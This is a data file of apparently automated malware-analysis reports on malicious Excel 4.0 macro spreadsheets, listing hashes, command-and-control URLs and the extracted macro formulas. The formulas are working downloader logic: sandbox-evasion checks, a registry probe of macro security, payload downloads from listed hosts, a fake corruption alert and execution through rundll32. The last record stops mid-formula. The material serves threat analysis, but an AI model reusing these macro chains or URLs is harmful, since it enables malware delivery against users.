{"version":"0.2","sample":{"sample":"","kind":"file","target":"3afc7aad815678f109e6cf3c19ff7dcc1f5117de007785bf388f0743bdf5514e"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3afc7aad815678f109e6cf3c19ff7dcc1f5117de007785bf388f0743bdf5514e","filesize":210432,"md5":"222c85b0c15ce2e6c83e061ddb12264c","sha1":"a31ccb2a7381f34e066f2000f539e5accc23bd37","sha256":"3afc7aad815678f109e6cf3c19ff7dcc1f5117de007785bf388f0743bdf5514e","sha512":"e5345c1a933652742ce8e7aeec0e36c36875c5a12ba287c91a179c29dc9fa22952c98ebe1f5a6dfbd0c64ecf797f5121cb7eb63b05f283fabc986e3490889f5f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3afc7aad815678f109e6cf3c19ff7dcc1f5117de007785bf388f0743bdf5514e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-frunt.php","https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-frunt.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6wga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QnKuAyOlBa\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b02fd96a1422fe6d931ac1177ce97886ac672e7cc904927129d8a35a51335c4"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b02fd96a1422fe6d931ac1177ce97886ac672e7cc904927129d8a35a51335c4","filesize":168960,"md5":"b5820e3f091c62813dbf329647c23858","sha1":"d2f0b325b25ffc1d0f80f2227eea49fe5fcfcde6","sha256":"3b02fd96a1422fe6d931ac1177ce97886ac672e7cc904927129d8a35a51335c4","sha512":"f8bcca6a59abcc553c035ad00e25b306cd3980bf52ac443e9d04a5d89a63b2eecb96eb2bd3434cd017b538662d351b90cb33d3fb8f4a8e6b6be191187962f6c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b02fd96a1422fe6d931ac1177ce97886ac672e7cc904927129d8a35a51335c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"F3eydF3BND\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b120dfb1c6803e8b3f06820092c7d4cc1c376fc2e5a3b7c556f9a9f69d45007"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b120dfb1c6803e8b3f06820092c7d4cc1c376fc2e5a3b7c556f9a9f69d45007","filesize":185344,"md5":"627737869f318be58cc04efc7b6dd6bd","sha1":"e10fc4b81a14c8cf99d4ff2acee15db8e7845b6f","sha256":"3b120dfb1c6803e8b3f06820092c7d4cc1c376fc2e5a3b7c556f9a9f69d45007","sha512":"86c9f17296721c93e8e713340727006ea970529022de8edf02b6480c33be1960f1ba06f4ce6b8743d3cc3b8dfc28dd57f2fe63c2755c0f04269ca6900cfdcd43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b120dfb1c6803e8b3f06820092c7d4cc1c376fc2e5a3b7c556f9a9f69d45007.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b1d3954f6299bed5156b56a70dd05129800ba24ad3e9c2c8723803d22605e81"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b1d3954f6299bed5156b56a70dd05129800ba24ad3e9c2c8723803d22605e81","filesize":209920,"md5":"a81fb0886549c6984f6677006e2a7623","sha1":"774629528f9ec6ba23b30b91a18c3898f319e75f","sha256":"3b1d3954f6299bed5156b56a70dd05129800ba24ad3e9c2c8723803d22605e81","sha512":"9e85049e96f7b7f3cc78e9cc40085b698254da8f5604730184fa8edd47bd889ba68c00610b35ac690faa49ebc939b28dfa83215f1aa89759ce02357a6d30d032","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b1d3954f6299bed5156b56a70dd05129800ba24ad3e9c2c8723803d22605e81.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0eJWZcL7CY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b1ff71fe280449e81ac69af3115fde02560ab5a8dd768c9782f48fa58f8fb1d"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b1ff71fe280449e81ac69af3115fde02560ab5a8dd768c9782f48fa58f8fb1d","filesize":185344,"md5":"226b8cfe27a3ef2a79c1461b2cf9ddc1","sha1":"e03f8d1264401c6704b2f6b2c67eea106b788254","sha256":"3b1ff71fe280449e81ac69af3115fde02560ab5a8dd768c9782f48fa58f8fb1d","sha512":"f7d269e6668860df17a588c050ef8fcab2e4910ec09a2b7c06df57c6be10938df3bd241373b01f0e091211da87fa7c0f5497fd1526b1ab6ea576b3b69ade2fba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b1ff71fe280449e81ac69af3115fde02560ab5a8dd768c9782f48fa58f8fb1d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b3c58a23eb07789c3fc32a73298ca8a79c534b1ab3af46f874f02bbff24d790"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b3c58a23eb07789c3fc32a73298ca8a79c534b1ab3af46f874f02bbff24d790","filesize":147968,"md5":"03dcb4c1bb76b05103e9768591873a61","sha1":"425737f5d0ad3c57fa4a691de60245878c3f680a","sha256":"3b3c58a23eb07789c3fc32a73298ca8a79c534b1ab3af46f874f02bbff24d790","sha512":"d1264d5ff9a69e92f1125b84d749fd8b2bff69c44f52e00e8fc6208c7f6971d4ea01b5b0bf4805c42a7f0e373a3f487347ffba9aec64a7e7ce527c68ede0c6ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b3c58a23eb07789c3fc32a73298ca8a79c534b1ab3af46f874f02bbff24d790.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"8zw1qGhkjv\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b4228c1c25ca432c95a39dc35f4e8fee5a0ccd5a6953c1998a136fa84457ae7"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b4228c1c25ca432c95a39dc35f4e8fee5a0ccd5a6953c1998a136fa84457ae7","filesize":160768,"md5":"a2dd5d59c29e4f1bbce9eddfd65bd7a1","sha1":"39a4a501148a9dcca5fa8e3221002db1e8c8c2dd","sha256":"3b4228c1c25ca432c95a39dc35f4e8fee5a0ccd5a6953c1998a136fa84457ae7","sha512":"e667fe5d77615b795b15d2d7219339b198e78f01cd6ae1b82e7c65845ee9b781f9b4ab4ff1c4974c8544985ba3b740785882bf8c3ff3f5e686975e412115cb01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b4228c1c25ca432c95a39dc35f4e8fee5a0ccd5a6953c1998a136fa84457ae7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NqhKpB5lqd\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b4bfa7ef38b19d9892172b2770a9aba44bcf67460139682d710d5b2e69486a4"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b4bfa7ef38b19d9892172b2770a9aba44bcf67460139682d710d5b2e69486a4","filesize":185344,"md5":"82de05063f8042716dc0f3d1afba9d34","sha1":"546d4262e5e7ffdd8deace3531ecc20ce64989e4","sha256":"3b4bfa7ef38b19d9892172b2770a9aba44bcf67460139682d710d5b2e69486a4","sha512":"c742f920e29049be65ec23994fac274800c0ae05176007553ab7a102668a4e85eaef8888ae06669b487cd30600300d9014e99fe2093b9b30d2639ebdc6fd5975","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b4bfa7ef38b19d9892172b2770a9aba44bcf67460139682d710d5b2e69486a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b72c4d0ae229b4b56d9c18b9479b647b221e4533ebb5c7708eeafece4d51fa3"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b72c4d0ae229b4b56d9c18b9479b647b221e4533ebb5c7708eeafece4d51fa3","filesize":112640,"md5":"708bfb64be41d64a968d806053e06896","sha1":"3b47353e3fc7a2db66279d0b649472a91e3f2ef6","sha256":"3b72c4d0ae229b4b56d9c18b9479b647b221e4533ebb5c7708eeafece4d51fa3","sha512":"7ed21d594475036499acbfcfbfde186e16046e913c9dce5c4339ed673f8d5993984f009c0f1406340ce711c8ca27b9a9f43971db269655bddf4d01b8a02c8a1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b72c4d0ae229b4b56d9c18b9479b647b221e4533ebb5c7708eeafece4d51fa3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b84ec967d469a76948c1a8343b8da96eb562d78be94400d4f0cdc1d5cc5a513"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b84ec967d469a76948c1a8343b8da96eb562d78be94400d4f0cdc1d5cc5a513","filesize":116224,"md5":"0a381fcb89f62bfe3dbb9832bc9389ef","sha1":"14439e47fcb97e86148286e1b77015288b21be96","sha256":"3b84ec967d469a76948c1a8343b8da96eb562d78be94400d4f0cdc1d5cc5a513","sha512":"b768514cbc51ec5d23db9c117b9db75085119338e7c49ae6101b7f528badf682908dca29ad27f39bd59cca5169b1e4859938f0bba7cbb3d5591f26a07d5b8f06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b84ec967d469a76948c1a8343b8da96eb562d78be94400d4f0cdc1d5cc5a513.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Nma6WhMUBz\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b88436b53485e7d1e6e879ad41dad2dcc65072a08cbff2311953d0e60ca413e"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b88436b53485e7d1e6e879ad41dad2dcc65072a08cbff2311953d0e60ca413e","filesize":144384,"md5":"5ff6f624e92d2280c997005eb06894d3","sha1":"f34e23d92e67af609c2841f934f90b48cc61bfcd","sha256":"3b88436b53485e7d1e6e879ad41dad2dcc65072a08cbff2311953d0e60ca413e","sha512":"b2c8bf09d16cf295fe1b6a9a93c32f14bd288057ffe3a86779d4fb1dcd62f038d6c437775747b36004d8d01546d996760b4de18b3e562ab8b62c398f400f8874","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b88436b53485e7d1e6e879ad41dad2dcc65072a08cbff2311953d0e60ca413e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"QlQD9Ke0qo\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b899d58e19d1dad74d7f8d3038a558d4c913b4cef878a133efeee9004b8d3f3"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b899d58e19d1dad74d7f8d3038a558d4c913b4cef878a133efeee9004b8d3f3","filesize":185344,"md5":"759910123e7477e8888d8386e769553f","sha1":"707ae9fd133997d65458e7689ad92e02875277da","sha256":"3b899d58e19d1dad74d7f8d3038a558d4c913b4cef878a133efeee9004b8d3f3","sha512":"8682e9ca37c371da9c9c174dcace3cc3add35d9b185bef8c678482e40b56969873e7a356c59ba84bb04269f5f8390b2cb90aa4a25ae10c2fcb7decc0da43eac4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b899d58e19d1dad74d7f8d3038a558d4c913b4cef878a133efeee9004b8d3f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3b8ef81436e3d0acce3534982e01893b53d379c2c5d8d1b82a4b22127dd19fae"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3b8ef81436e3d0acce3534982e01893b53d379c2c5d8d1b82a4b22127dd19fae","filesize":209920,"md5":"0f83c90cbf0640fa8d96a28dffb4b5d1","sha1":"68a69b2e5d326a2b30534ce8f0f9f4d60263639b","sha256":"3b8ef81436e3d0acce3534982e01893b53d379c2c5d8d1b82a4b22127dd19fae","sha512":"57221b482f792960f5dc6d807b229dce368cca49854ae125ce3d7606a37de3460951e7865f1998fd94f350552d5eeac4c4e8bceb4c55c5bf7d0888ee355c7a43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3b8ef81436e3d0acce3534982e01893b53d379c2c5d8d1b82a4b22127dd19fae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KWiSebuGeG\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ba550c0a9834236c994040d499df493298e2d79e72018df013c9d004f222b20"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3ba550c0a9834236c994040d499df493298e2d79e72018df013c9d004f222b20","filesize":171008,"md5":"c3c15d734b7b55da06edef8784fd700c","sha1":"f4027d983e5458ff257dc470b346ec9b659ca543","sha256":"3ba550c0a9834236c994040d499df493298e2d79e72018df013c9d004f222b20","sha512":"f78d9785935d4d90cb676fbc412f893f455ff032577f87d537c75c8a15c9e2b15971b525cbe77edcc0d7244d2ba73b6042d53fc4cd461344d06f9c698208f01b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ba550c0a9834236c994040d499df493298e2d79e72018df013c9d004f222b20.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gpgCw1zyyB\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3bb1013cc2e0f89652d9f5ef809f4a4bbe896f08d409f833267be46b924b1b0e"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3bb1013cc2e0f89652d9f5ef809f4a4bbe896f08d409f833267be46b924b1b0e","filesize":167936,"md5":"8990567d4f4b205cf7acab8e4db1305e","sha1":"f7ab2dbed3c75d8b9182d385124d173f3f252001","sha256":"3bb1013cc2e0f89652d9f5ef809f4a4bbe896f08d409f833267be46b924b1b0e","sha512":"7053a22475c34a1e8c0a6a0b837ef6273f02c96bea2bb2330823c1c41207720dc78c8f12710781c96b1bc67a53a2673a2018cb8ee8a446d26ac3dbb424feb398","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3bb1013cc2e0f89652d9f5ef809f4a4bbe896f08d409f833267be46b924b1b0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yIvOMz0iwY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3bd65c1eef9288a05a1733d62e851cd96cebc32c09b473997341b1ef83225fd7"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3bd65c1eef9288a05a1733d62e851cd96cebc32c09b473997341b1ef83225fd7","filesize":206336,"md5":"2b9ca14794cfdaf60d149af2211eaca0","sha1":"cce5b33ee6f3f1f113214606ca47851f33861011","sha256":"3bd65c1eef9288a05a1733d62e851cd96cebc32c09b473997341b1ef83225fd7","sha512":"5548aed864442741ccf6c45575f44d87355f3073ec059b131c23e7bb3b1b40a547c89bf7f60a1f9a21313e4080670d5af64d088c76c96388a841a3eed966603c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3bd65c1eef9288a05a1733d62e851cd96cebc32c09b473997341b1ef83225fd7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 